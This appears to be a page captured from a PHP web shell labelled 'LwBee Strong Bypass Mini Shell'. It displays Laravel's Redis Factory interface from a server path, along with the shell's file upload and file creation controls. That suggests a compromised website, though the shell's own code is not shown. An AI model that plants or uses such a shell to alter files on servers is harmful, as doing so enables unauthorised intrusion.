/home/aloic1/public_html/core/vendor/laravel/framework/src/Illuminate/Contracts/Redis/Factory.php
<?php

namespace Illuminate\Contracts\Redis;

interface Factory
{
    /**
     * Get a Redis connection by name.
     *
     * @param  string|null  $name
     * @return \Illuminate\Redis\Connections\Connection
     */
    public function connection($name = null);
}
@LwBee Strong Bypass

LwBee Strong Bypass Mini Shell

Upload File

Create New File